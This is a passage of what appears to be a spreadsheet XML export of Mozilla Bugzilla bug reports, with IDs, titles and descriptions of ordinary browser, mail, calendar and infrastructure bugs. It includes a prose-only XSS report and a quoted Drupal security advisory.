still be able to select the right one if both were shown but as it is now if I
import two different certificates with the same CA only the first one I imported
is shown.
I think this happens more often than one should think because the subject is
often a persons full name and a person can have certificates from different CAs.
Using Thunderbird 1.0
Reproducible: Always
Steps to Reproduce:
1. Import two different certificates with the same subject
2. Selecting Mail &amp; Newsgroup Account settings security Digital signing 
3. Press select
Actual Results:  
In the certificate combo box only one certificate is shown
Expected Results:  
Both certificates should have been shown. They are postfixed by the serial
number in the combo box so they can still be distinguished..</t>
  </si>
  <si>
    <t>SEAMONKEY-481850</t>
  </si>
  <si>
    <t>Port  Bug 480893 (Session Restore start new session does not follow startup page option) to SeaMonkey</t>
  </si>
  <si>
    <t>Created attachment 365877
patch
After selecting New Session from Session Restore dialog the browser opens my
homepage in a new tab rather than following my configuration to open a blank
tab on startup.
Reproducible: Always
Steps to Reproduce:
1. Set pref to open a blank page on startup.
2. Click New Session from within session restore dialog
Actual Results:  
Opens home page url
Expected Results:  
Opens a blank tab</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-358878</t>
  </si>
  <si>
    <t>Feed preview's request for favicon.ico should not send Referer</t>
  </si>
  <si>
    <t>Just setting the image of a menuitem is apparently sending a referer when getting that image which may be ok in the general context of a xul menu.
In the context of feed preview though it sends the URL of the users feed to the service at least when that service manages to not get his favicon cached.
We should fix that maybe by hooking a loader object in the middle explicitly and use data urls or just a x-no-referer protocol or so.</t>
  </si>
  <si>
    <t>CORE-444252</t>
  </si>
  <si>
    <t>NPNVxDisplay for windowless plugins should not return the Display* of an XtBin</t>
  </si>
  <si>
    <t>Created attachment 328606
use GDK_DISPLAY() in the same way as XEmbed plugins
Mozilla's Display* connection to the X server is already available to plugins through the ws_info NPSetWindowCallbackStruct of the NPWindow but
NPN_GetValue(NPNVxDisplay) should return the same connection rather than creating an XtBin for a different connection that is unnecessary for windowless plugins.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-302069</t>
  </si>
  <si>
    <t>Custom events don't bubble</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b4) Gecko/20050725 Firefox/1.0+
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b4) Gecko/20050725 Firefox/1.0+
Unlike other processors we don't bubble custom events by default.
Reproducible: Always</t>
  </si>
  <si>
    <t>stpride</t>
  </si>
  <si>
    <t>CORE-56747</t>
  </si>
  <si>
    <t>one-time leak of 5 nsVoidArray from nsTimerGtk::Init</t>
  </si>
  <si>
    <t>nsTimerGtk has a one-time leak of 5 nsVoidArray.  They should be deleted in the
module destructor.
Patch coming once I write it...</t>
  </si>
  <si>
    <t>CORE-383917</t>
  </si>
  <si>
    <t>The new Components.utils.import code shouldn't spam the console</t>
  </si>
  <si>
    <t>Created attachment 267861
patch
The console should not be spammed with logging printf stuff by default. We should use NSPR logging. Here's a patch to require NSPR_LOG_MODULES=JSComponentLoader:5 to show the Installing symbols messages.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-410271</t>
  </si>
  <si>
    <t>bm-xserve09 has a hardware failure</t>
  </si>
  <si>
    <t>Started a Thunderbird build 2007-12-30 04:21 hasn't been heard from since making nagios squawk about how it didn't get around to building the XULRunner nightly.</t>
  </si>
  <si>
    <t>CALENDAR-402421</t>
  </si>
  <si>
    <t>Saving NEW Event/Task creates a new event each time</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a9pre) Gecko/2007110306 Calendar/0.6a1
Saving a new Event or Task before using Save and Close creates a new Event/Task each time you save the it.
Reproducible: Always
Steps to Reproduce:
1. Push the New Task button in the toolbar.
2. Push File-&gt;Save or Ctrl+S in the new task window.
2.1 This creates the new Task.
3. Push File-&gt;Save or Ctrl+S again.
3.1 This creates another new task.
Actual Results:  
Saving creates serveral new tasks/events.
Expected Results:  
Saving should create ONE new task/events while saving the first time and then edit the new event.</t>
  </si>
  <si>
    <t>brudaswen</t>
  </si>
  <si>
    <t>TOOLKIT-846455</t>
  </si>
  <si>
    <t>Blocklist Solid Savings add-on</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #845581 +++
Installed by Fun4IM installer. Not entirely sure what it does. I haven't seen any effects in search or shopping pages.
Solid Savings: 9518042e-7ad6-4dac-b377-056e28d00c8f@f1cc0a13-4df1-4d66-938f-088db8838882.com</t>
  </si>
  <si>
    <t>kmaglione+bmo</t>
  </si>
  <si>
    <t>BUGZILLA-216902</t>
  </si>
  <si>
    <t>LDAP: Bugzilla should support SSL conection (LDAPS)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 .NET CLR 1.0.3705 .NET CLR 1.1.4322)
Build Identifier: 
When the server for the authentification is not the same as the one with 
bugzilla it could be better to use ldaps. Only for security reason.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>jean-francois_belanger</t>
  </si>
  <si>
    <t>CORE-296514</t>
  </si>
  <si>
    <t>event handler and modal dialog allows XSS attacks</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1)
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.8b2) Gecko/20050602 Firefox/1.0+ (2005060218)
Mozilla stops any scripts in the current page including event handlers
when it loads a new page. But in some cases mozilla fails to stop event
handlers in the previous page. This is not a problem because such event
handler finish their exection before the new page is loaded. However
if such event handler shows a modal dialog the handler stops its
execution and mozilla continues to load the new page. If user closes
the modal dialog after mozilla loaded the new page the handler
continues its execution in the context of the new page.
Reproducible: Always
Steps to Reproduce:
1. load the testcase.
2. push invoke an exploit button.
Actual Results:  
The event handler is executed in the context of the new page.
Expected Results:  
The event handler must be stopped before loading the new page.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-191700</t>
  </si>
  <si>
    <t>Location proxy keeps previous URL if new URL does not exist</t>
  </si>
  <si>
    <t>Type an URL that does not exist (or that can't be reached offline) hit Enter
the alert sheet appears the new URL is in the Location field.
Drag the Location field proxy icon it is the previous URL that is dragged not
the new unreachable one.
Build 20030131</t>
  </si>
  <si>
    <t>TOOLKIT-518951</t>
  </si>
  <si>
    <t>SQLite valgrind errors on startup page visits</t>
  </si>
  <si>
    <t>SQLite or storage is misbehaving.</t>
  </si>
  <si>
    <t>NSS-394419</t>
  </si>
  <si>
    <t>Add secomtrust EV Root CA</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 SV1 .NET CLR 1.1.4322 InfoPath.1)
Build Identifier: IE6.0.2900.2180
We would like you to embed our Root CA called Security Communication EV RootCA1.
The information is as follows.
CA Details
----------
CA Name:
Security Communication EV RootCA1
Website: 
One Paragraph Summary of CA including the following:
- General nature (e.g. commercial governmentacademic/research nonprofit):
Commercial
- Primary geographical area(s) served
Japan
- Number and type of subordinate CAs Audit Type (WebTrust ETSI etc.):
Auditor:
KPMG
Auditor Website:
http://www.kpmg.com/
Audit Document URL(s):
None
Readiness Audit Report is avaiable upon request 
URL of certificate hierarchy diagram:
Diagram is available upon request
Certificate Details
-------------------
(To be completed once for each certificate note that we only 
include root certificates in the store not intermediates.)
Certificate Name:
Security Communication EV RootCA1
Summary Paragraph including the following:
- End entity certificate issuance policy
i.e. what you plan to do with the root Certificate HTTP URL (on CA website):
ã€€https://repository.secomtrust.net/EV-Root1/
Version:
3
SHA1 Fingerprint:
FEB8 C432 DCF9 769A CEAE 3DD8 908F FD28 8665 647D
Modulus Length (a.k.a. key length):
2048bits
Valid From (YYYY-MM-DD):
2007-06-06
Valid To (YYYY-MM-DD):
2037-06-06
CRL HTTP URL:
http://repository.secomtrust.net/EV-Root1/EVRoot1CRL.crl
CRL issuing frequency for end-entity certificates:
1year
OCSP URL:
None
Class (domain-validated identity/organisationally-validated or EV):
EV
Certificate Policy URL:
https://repository.secomtrust.net/EV-Root1/
CPS URL:
https://repository.secomtrust.net/EV-Root1/EVRoot1CPS.pdf
Requested Trust Indicators (email and/or SSL and/or code):
All is desiable.
URL of website using certificate chained to this root (if applying for SSL):
https://repo2.secomtrust.net/ev.gif
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>h-kamo</t>
  </si>
  <si>
    <t>CALENDAR-326116</t>
  </si>
  <si>
    <t>Check etag when downloading</t>
  </si>
  <si>
    <t>Should check the etag when downloading so that we can detect if there have been any remote changes. If there were no changes we can skip the parsing step.</t>
  </si>
  <si>
    <t>NSS-194222</t>
  </si>
  <si>
    <t>Use the new NSPR 4.3 function PR_CallOnceWithArg</t>
  </si>
  <si>
    <t>NSPR 4.3 has a new function PR_CallOnceWithArg that
allows you to pass an argument to the call-once function.
The SECMOD_CallOnce function that we added in NSS 3.7
as part of the fix for bug 183612 should be replaced by
PR_CallOnceWithArg.  I also found that there is an
implementation of call once with arg in lib/base/tracker.c
that can be replaced by this new NSPR 4.3 function.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-436886</t>
  </si>
  <si>
    <t>McCoy</t>
  </si>
  <si>
    <t>Fix mochitest options</t>
  </si>
  <si>
    <t>Created attachment 323394
patch
When I adjusted runtests.py I didn't really notice that I dropped support for most of hte command line flags. This adds them back using the same code from mozilla to generate the mochitest harness url but just passing it through the preferences system. This reenables things like autorun and close-when-done allowing for tests to be run as part of an automated process</t>
  </si>
  <si>
    <t>FIREFOX-871594</t>
  </si>
  <si>
    <t>Replace references to BookmarksMenuButton to BookmarkingUI in browser-places.js</t>
  </si>
  <si>
    <t>There are two places where we have error messages referring to BookmarksMenuButton when BookmarksMenuButton has been renamed as BookmarkingUI.
We should update those error messages.</t>
  </si>
  <si>
    <t>mconley</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-521921</t>
  </si>
  <si>
    <t>Reboot MDC server</t>
  </si>
  <si>
    <t>Restarting the wiki didn't apparently do the job we need to completely reboot apparently. The stray files left behind by the crashed extensions are preventing us from restarting them.
We might need to delete these files first:
/var/www/.wapi/*</t>
  </si>
  <si>
    <t>CORE-123049</t>
  </si>
  <si>
    <t>AppendChange() includes frames that can be destroyed on the fly causes crash</t>
  </si>
  <si>
    <t>Not sure exactly who to give this to so I'm cc'ing some layout heavy-hitters
and assigning it to myself ...
This bug was originally reported as bug 117141 (Composer crashes when loading
pages with an HTML Select element [@FrameManager::GetPrimaryFrameFor]) for
which I checked in a work around.
The basic problem is that nsStyleChangeList::AppendChange() does not deal
with the fact that anonymous frames can point to either an anonymous content
node or the content node for a parent frame.
Should two or more sibling anonymous content frames require a frame change
we can get into trouble if we push an anonymous content node on the changelist
and then push the parent content node on the list as the result of a
sibling frame who's content pointer pointed to the parent content node.
nsCSSFrameConstructor::ProcessRestyledFrames() processes the changelist
backwards which means it would process the parent content node first so
as a result we end up blowing away the entire frame hierarchy including
the anonymous content frames and all their anonymous content. Leaving
deleted nodes in the change list that will be processed.
When they do get processed we usually crash some place like
GetPrimaryFrameFor().
I'll attatch a JS test case that demostrates this crash rather easily
in the browser and viewer. It's probably a good idea to read over
the comments dbaron and I made in bug 117141 for more details.
A stack trace for the crash looks something like this:
FrameManager::GetPrimaryFrameFor(FrameManager * const 0x03d4e118 nsIContent *
0x03ab4b68 nsIFrame * * 0x0012ccec) line 645 + 33 bytes
PresShell::GetPrimaryFrameFor(const PresShell * const 0x03890b08 nsIContent *
0x03ab4b68 nsIFrame * * 0x0012ccec) line 5453 + 32 bytes
nsCSSFrameConstructor::RecreateFramesForContent(nsIPresContext * 0x03951220
nsIContent * 0x03ab4b68 int 0 nsIStyleRule * 0x00000000 nsIStyleContext *
0x00000000) line 11834
nsCSSFrameConstructor::ProcessRestyledFrames(nsCSSFrameConstructor * const
0x03d53160 nsStyleChangeList &amp; {...} nsIPresContext * 0x03951220) line 10012
nsCSSFrameConstructor::AttributeChanged(nsCSSFrameConstructor * const
0x03d53160 nsIPresContext * 0x03951220 nsIContent * 0x03c8fbb0 int 0 nsIAtom
* 0x0158a710 int 1 int 3) line 10558
StyleSetImpl::AttributeChanged(StyleSetImpl * const 0x03622a30 nsIPresContext *
0x03951220 nsIContent * 0x03c8fbb0 int 0 nsIAtom * 0x0158a710 int 1 int -1)
line 1495
PresShell::AttributeChanged(PresShell * const 0x03890b10 nsIDocument *
0x03cf6028 nsIContent * 0x03c8fbb0 int 0 nsIAtom * 0x0158a710 int 1 int -1)
line 5121 + 61 bytes
nsDocument::AttributeChanged(nsDocument * const 0x03cf6028 nsIContent *
0x03c8fbb0 int 0 nsIAtom * 0x0158a710 int 1 int -1) line 1970 + 36 bytes
nsHTMLDocument::AttributeChanged(nsHTMLDocument * const 0x03cf6028 nsIContent *
0x03c8fbb0 int 0 nsIAtom * 0x0158a710 int 1 int -1) line 1463
nsGenericHTMLElement::SetAttr(nsGenericHTMLElement * const 0x03c8fbb0 int 0
nsIAtom * 0x0158a710 const nsAString &amp; {...} int 1) line 1663
nsGenericHTMLElement::SetFormControlAttribute(nsIForm * 0x00000000 int 0
nsIAtom * 0x0158a710 const nsAString &amp; {...} int 1) line 4142 + 28 bytes
nsGenericHTMLContainerFormElement::SetAttr(nsGenericHTMLContainerFormElement *
const 0x03c8fbb0 int 0 nsIAtom * 0x0158a710 const nsAString &amp; {...} int 1)
line 4180
nsGenericHTMLElement::SetAttr(nsGenericHTMLElement * const 0x03c8fbb0
nsINodeInfo * 0x039519d8 const nsAString &amp; {...} int 1) line 1685 + 33 bytes
nsGenericHTMLContainerFormElement::SetAttr(nsGenericHTMLContainerFormElement *
const 0x03c8fbb0 nsINodeInfo * 0x039519d8 const nsAString &amp; {...} int 1) line
4188
nsGenericElement::SetAttribute(nsGenericElement * const 0x03c8fbb0 const
nsAString &amp; {...} const nsAString &amp; {...}) line 954 + 27 bytes
nsGenericHTMLElement::SetAttribute(nsGenericHTMLElement * const 0x03c8fbb0
const nsAString &amp; {...} const nsAString &amp; {...}) line 109
nsHTMLSelectElement::SetAttribute(nsHTMLSelectElement * const 0x03c8fbb0 const
nsAString &amp; {...} const nsAString &amp; {...}) line 140 + 20 bytes
XPTC_InvokeByIndex(nsISupports * 0x03c8fbe0 unsigned int 30 unsigned int 2
nsXPTCVariant * 0x0012d5f8) line 106
XPCWrappedNative::CallMethod(XPCCallContext &amp; {...} XPCWrappedNative::CallMode
CALL_METHOD) line 1998 + 42 bytes
XPC_WN_CallMethod(JSContext * 0x0361a768 JSObject * 0x02d18d40 unsigned int 2
long * 0x03cfad4c long * 0x0012d8d4) line 1266 + 14 bytes
js_Invoke(JSContext * 0x0361a768 unsigned int 2 unsigned int 0) line 832 + 23
bytes
js_Interpret(JSContext * 0x0361a768 long * 0x0012e6c4) line 2800 + 15 bytes
js_Invoke(JSContext * 0x0361a768 unsigned int 1 unsigned int 2) line 849 + 13
bytes
js_InternalInvoke(JSContext * 0x0361a768 JSObject * 0x02d17520 long 47287432
unsigned int 0 unsigned int 1 long * 0x0012e91c long * 0x0012e7ec) line 924 +
20 bytes
JS_CallFunctionValue(JSContext * 0x0361a768 JSObject * 0x02d17520 long
47287432 unsigned int 1 long * 0x0012e91c long * 0x0012e7ec) line 3405 + 31 bytes
nsJSContext::CallEventHandler(nsJSContext * const 0x02fb10c8 void * 0x02d17520
void * 0x02d18c88 unsigned int 1 void * 0x0012e91c int * 0x0012e920 int 0)
line 1016 + 33 bytes
nsJSEventListener::HandleEvent(nsJSEventListener * const 0x03d2bc00 nsIDOMEvent
* 0x03c4fb70) line 180 + 77 bytes
nsEventListenerManager::HandleEventSubType(nsListenerStruct * 0x03949518
nsIDOMEvent * 0x03c4fb70 nsIDOMEventTarget * 0x0393ab70 unsigned int 4
unsigned int 7) line 1205 + 20 bytes
nsEventListenerManager::HandleEvent(nsEventListenerManager * const 0x03d2bb88
nsIPresContext * 0x03951220 nsEvent * 0x0012f48c nsIDOMEvent * * 0x0012f124
nsIDOMEventTarget * 0x0393ab70 unsigned int 7 nsEventStatus * 0x0012f828) line
1373 + 36 bytes
nsGenericElement::HandleDOMEvent(nsGenericElement * const 0x03d2b838
nsIPresContext * 0x03951220 nsEvent * 0x0012f48c nsIDOMEvent * * 0x0012f124
unsigned int 1 nsEventStatus * 0x0012f828) line 1652
nsHTMLInputElement::HandleDOMEvent(nsHTMLInputElement * const 0x03d2b838
nsIPresContext * 0x03951220 nsEvent * 0x0012f48c nsIDOMEvent * * 0x00000000
unsigned int 1 nsEventStatus * 0x0012f828) line 1190 + 29 bytes
PresShell::HandleEventInternal(nsEvent * 0x0012f48c nsIView * 0x00000000
unsigned int 1 nsEventStatus * 0x0012f828) line 6000 + 44 bytes
PresShell::HandleEventWithTarget(PresShell * const 0x03890b08 nsEvent *
0x0012f48c nsIFrame * 0x03b5819c nsIContent * 0x03d2b838 unsigned int 1
nsEventStatus * 0x0012f828) line 5969 + 22 bytes
nsEventStateManager::CheckForAndDispatchClick(nsEventStateManager * const
0x0394a128 nsIPresContext * 0x03951220 nsMouseEvent * 0x0012f92c
nsEventStatus * 0x0012f828) line 2463 + 63 bytes
nsEventStateManager::PostHandleEvent(nsEventStateManager * const 0x0394a130
nsIPresContext * 0x03951220 nsEvent * 0x0012f92c nsIFrame * 0x03b5819c
nsEventStatus * 0x0012f828 nsIView * 0x0394da90) line 1544 + 28 bytes
PresShell::HandleEventInternal(nsEvent * 0x0012f92c nsIView * 0x0394da90
unsigned int 1 nsEventStatus * 0x0012f828) line 6020 + 43 bytes
PresShell::HandleEvent(PresShell * const 0x03890b0c nsIView * 0x0394da90
nsGUIEvent * 0x0012f92c nsEventStatus * 0x0012f828 int 0 int &amp; 1) line 5923 +
25 bytes
nsView::HandleEvent(nsView * const 0x0394da90 nsGUIEvent * 0x0012f92c unsigned
int 0 nsEventStatus * 0x0012f828 int 0 int &amp; 1) line 390
nsView::HandleEvent(nsView * const 0x03d06380 nsGUIEvent * 0x0012f92c unsigned
int 0 nsEventStatus * 0x0012f828 int 0 int &amp; 1) line 347
nsView::HandleEvent(nsView * const 0x03d8f228 nsGUIEvent * 0x0012f92c unsigned
int 0 nsEventStatus * 0x0012f828 int 1 int &amp; 1) line 347
nsViewManager::DispatchEvent(nsViewManager * const 0x03956ab8 nsGUIEvent *
0x0012f92c nsEventStatus * 0x0012f828) line 1900
HandleEvent(nsGUIEvent * 0x0012f92c) line 83
nsWindow::DispatchEvent(nsWindow * const 0x0392c4fc nsGUIEvent * 0x0012f92c
nsEventStatus &amp; nsEventStatus_eIgnore) line 850 + 10 bytes
nsWindow::DispatchWindowEvent(nsGUIEvent * 0x0012f92c) line 871
nsWindow::DispatchMouseEvent(unsigned int 301 nsPoint * 0x00000000) line 4527 +
21 bytes
ChildWindow::DispatchMouseEvent(unsigned int 301 nsPoint * 0x00000000) line 4779
nsWindow::ProcessMessage(unsigned int 514 unsigned int 0 long 1507413 long *
0x0012fd20) line 3419 + 24 bytes
nsWindow::WindowProc(HWND__ * 0x000b027e unsigned int 514 unsigned int 0 long
1507413) line 1115 + 27 bytes
USER32! 77e12e98()
USER32! 77e130e0()
USER32! 77e15824()
nsAppShellService::Run(nsAppShellService * const 0x010d71a8) line 308
main1(int 1 char * * 0x003c7380 nsISupports * 0x00000000) line 1285 + 32 bytes
main(int 1 char * * 0x003c7380) line 1625 + 37 bytes
mainCRTStartup() line 338 + 17 bytes</t>
  </si>
  <si>
    <t>FIREFOX-431154</t>
  </si>
  <si>
    <t>Crash when tab is closed with Ctrl+W</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9pre) Gecko/2008042804 Minefield/3.0pre
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9pre) Gecko/2008042804 Minefield/3.0pre
The latest build of Minefield crashes whenever a tab is closed with the Ctrl+W key combination.
Reproducible: Always
Steps to Reproduce:
1. Open multiple tabs.
2. Press Ctrl+W to close one of the tabs.
3.
Actual Results:  
Minefield crashes (and the crash reporter comes up).
Expected Results:  
The tab should close without a crash.
This occurs in both old and freshly created profiles.</t>
  </si>
  <si>
    <t>theo148</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-484652</t>
  </si>
  <si>
    <t>Add Korean (ko) Fennec l10n to the l10n dashboard</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X 10.4 ko rv:1.9.0.7) Gecko/2009021906 Firefox/3.0.7
Build Identifier: 
I finished Fennec l10n in Korean.
It would be great if you could add it to the l10n dashboard.
Reproducible: Always</t>
  </si>
  <si>
    <t>joone.hur</t>
  </si>
  <si>
    <t>CALENDAR-355927</t>
  </si>
  <si>
    <t>Make description in install.rdf localizable</t>
  </si>
  <si>
    <t>Make description in install.rdf localizale. See http://developer.mozilla.org/en/docs/Localizing_extension_descriptions for details.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-660184</t>
  </si>
  <si>
    <t>Please deploy TBPL</t>
  </si>
  <si>
    <t>Please deploy TBPL tip to tbpl.mozilla.org.</t>
  </si>
  <si>
    <t>SEAMONKEY-161249</t>
  </si>
  <si>
    <t>maximize error when parts of the window are out of sight</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Macintosh U PPC Mac OS X en-US rv:1.1b) Gecko/20020722
BuildID:    2002072203
a window that is not completely visible on the screen (e.g. the lower end is out
of the screen) can not be maximized! if you try it the result is an empty
window. even the top bars (locationbar bookmarkbar) disappears. you have to
make the window smaller so everything is visible again and press the maximize
button again...
Reproducible: Always
Steps to Reproduce:
1.create a new window
2.move some parts of the window out of your monitor (e.g. move down until one
half of the window is not visible anymore)
3.press the green maximize button in the window bar
Actual Results:  the window will not maximize and is completely empty now
Expected Results:  maximize the window?!?
i have two screens but i think it is not the problem because it happens even on
the main screen...</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-339079</t>
  </si>
  <si>
    <t>Fix strict JS errors with select and select1</t>
  </si>
  <si>
    <t>we have a couple of complaints about functions not always returning values</t>
  </si>
  <si>
    <t>TOOLKIT-347568</t>
  </si>
  <si>
    <t>No updates were found bar should be dismissed when you change view</t>
  </si>
  <si>
    <t>It is possible with the add-ons manager to have both the No updates were found bar displayed as well as a list of updates that can be installed.  Obviously this should not happen.
Steps to reproduce:
1.  Make sure all of your themes are up-to-date.
2.  Make sure you have at least one extension for which find Updates will find a newer version.
3.  Go to Tools -&gt;  Add-ons -&gt; Themes.
4.  Click on Find Updates
5.  When the No updates were found bar appears do not close it.
6.  Select Extensions.
7.  Click on Find updates.
This will result in both the No updates were found bar being displayed at the same time a list of available extension updates is shown.
The simple fix here would be to dismiss the No updates were found bar when you click on Find Updates.</t>
  </si>
  <si>
    <t>wgianopoulos</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-365695</t>
  </si>
  <si>
    <t>Bad Mac version test macro</t>
  </si>
  <si>
    <t>Created attachment 250203
fix
This test in gfx/thebes/src/gfxQuartzPDFSurface.cpp:
#if MAC_OS_X_VERSION_MAX_ALLOWED &gt;= MAC_OS_X_VERSION_10_4
is bad because MAC_OS_X_VERSION_10_4 isn't defined in 10.3 systems. This trivial patch fixes it.</t>
  </si>
  <si>
    <t>CORE-378621</t>
  </si>
  <si>
    <t>The result from XineramaQueryScreens() is leaked</t>
  </si>
  <si>
    <t>Xinerama.h says:
/*
   Returns the number of heads and a pointer to an array of
   structures describing the position and size of the individual
   heads.  Returns NULL and number = 0 if Xinerama is not active.
   Returned array should be freed with XFree().
*/
XineramaScreenInfo *
XineramaQueryScreens(
   Display *dpy
   int     *number
)</t>
  </si>
  <si>
    <t>THUNDERBIRD-372316</t>
  </si>
  <si>
    <t>opening a .eml file with spotlight integration enabled crashes</t>
  </si>
  <si>
    <t>if spotlight integration is turned on loading a .eml file crashes because we use an nsMessenger instance w/o a msgWindow to try to get a msghdr from a uri. The simplest fix is to just do a null check in GetMsgHdrFromUri.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-159487</t>
  </si>
  <si>
    <t>pier1.com blocks access</t>
  </si>
  <si>
    <t>The sniffer redirects to http://www.pier1.com/errorpage/warning.asp?level=halt
They say they support Netscape 6.2
Mozilla 1.0 is blocked
My agent string:  Mozilla/5.0 (X11 U Not your mother's penguin i686) Gecko/0</t>
  </si>
  <si>
    <t>spamshawn</t>
  </si>
  <si>
    <t>FIREFOX-345524</t>
  </si>
  <si>
    <t>hide the tab dnd indicator when it's over the original tab</t>
  </si>
  <si>
    <t>hide the tab dnd indicator when it's over the original tab
this comes from https://bugzilla.mozilla.org/show_bug.cgi?id=333791#c36
the fix is in wayne's patch for bug #333791 but I think it makes sense to have a separate bug for this issue so that it can be separately tracked / verified.</t>
  </si>
  <si>
    <t>waynegwoods</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-472862</t>
  </si>
  <si>
    <t>Remove 3.1a1pre mar files from latest-comm-1.9.1 directory on ftp</t>
  </si>
  <si>
    <t>As a result of my mess up in bug 469835 we now have several thunderbird-3.1a1pre-*.mar files in:
ftp://ftp.mozilla.org/pub/thunderbird/nightly/latest-comm-1.9.1/
Please can we delete these as I think it may mess up aus. It is only the update snippets that got named wrong the build versions were fine. Though I'm wondering if we should disable trunk aus updates for a day or two just so we can check everyone is still on 1.9.1.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-467801</t>
  </si>
  <si>
    <t>Update mdc: links on wiki.mo for new paths on the new MDC</t>
  </si>
  <si>
    <t>These links are currently routing to en/docs/... on MDC but the /docs part is no longer needed resulting in an unnecessary redirect.  Would be nice to get rid of that.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-259687</t>
  </si>
  <si>
    <t>New version of the SpoofStick extension</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 rv:1.7.3) Gecko/20040914 Firefox/0.10
Build Identifier: Mozilla/5.0 (X11 U Linux i686 rv:1.7.3) Gecko/20040914 Firefox/0.10
A new version of the SpoofStick extension has been released (1.03).  This
version is compatible with FF 1.0PR.
The XPI URL is still: http://www.corestreet.com/demos/spoofstick-firefox.xpi
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>mayzenshtat</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-478686</t>
  </si>
  <si>
    <t>Command Line</t>
  </si>
  <si>
    <t>Ever seen a 'j' show up in the editor after jumping between command line and editor. Only happens in Firefox</t>
  </si>
  <si>
    <t>Kevin:
----------
BTW I could reproduce the mysterious j appearing when pressing control-J. Here are the steps:
1. load the editor page afresh
2. click on the command line
3. press control-j repeatedly
----------</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-276196</t>
  </si>
  <si>
    <t>decathlon.fr - missing background in page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Go to the specified URL and look... The backgroud images are missing. With IE
everything is fine.
Reproducible: Always
Steps to Reproduce:
1. Go to the URL
2. Look
3.
Actual Results:  
Missing background.</t>
  </si>
  <si>
    <t>sbouchex</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-463425</t>
  </si>
  <si>
    <t>CCK needs to be upgraded.</t>
  </si>
  <si>
    <t>Hi Gozer
Would you upgrade CCK  thanks 
------------SA-2008-069 - CCK FOR 5.X AND 6.X - XSS VULNERABILITIES------------
 * Advisory ID: DRUPAL-SA-2008-069
 * Project: Content Construction Kit (third-party module)
 * Versions: 5.x 6.x
 * Date: 2008-November-5
 * Security risk: Minor
 * Exploitable from: Remote
 * Vulnerability: Cross site scripting
------------DESCRIPTION------------
The Content Construction Kit (CCK) allows certain privileged users to add
custom fields to content types using a web browser.
Some field labels and content-type names are displayed without appropriate
filtering in the administrative interface. Malicious users with the administer
content permission are able to exploit this issue and insert arbitrary HTML and
script code into pages. Such a cross site scripting attack (XSS) may lead to the
malicious user gaining full administrative access.
This is only an issue if you need any role separation between administrators
and users with the administer content permission.
------------VERSIONS AFFECTED------------
 * CCK for Drupal 5.x prior to 5.x-1.10
 * CCK for Drupal 6.x prior to 6.x-2.0 (including all RC releases)
Drupal core is not affected. If you do not use the contributed CCK module
there is nothing you need to do.
------------SOLUTION------------
Install the latest version:
 * For Drupal 5.x install CCK 5.x-1.10 [ http://drupal.org/node/330570 ]
 * For Drupal 6.x install CCK 6.x-2.0 [ http://drupal.org/node/330573 ]
See also the CCK project page [ http://drupal.org/project/cck ].
------------REPORTED BY------------
The cross site scripting issue was reported by CCK maintainers.</t>
  </si>
  <si>
    <t>CORE-207531</t>
  </si>
  <si>
    <t>Allow editor to edit xhtml files (as html)</t>
  </si>
  <si>
    <t>This is not a panacea it won't switch composer into an xml editing mode nor
will it prevent composer from using htmlisms nor will it enable composer to
save as xml/xhtml.
all i want is to be able to load an xhtml file edit it (as html) and save as
html (or text). and that's all my patch does.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-296201</t>
  </si>
  <si>
    <t>Mailing list archives should be (at least) keyword searchable</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
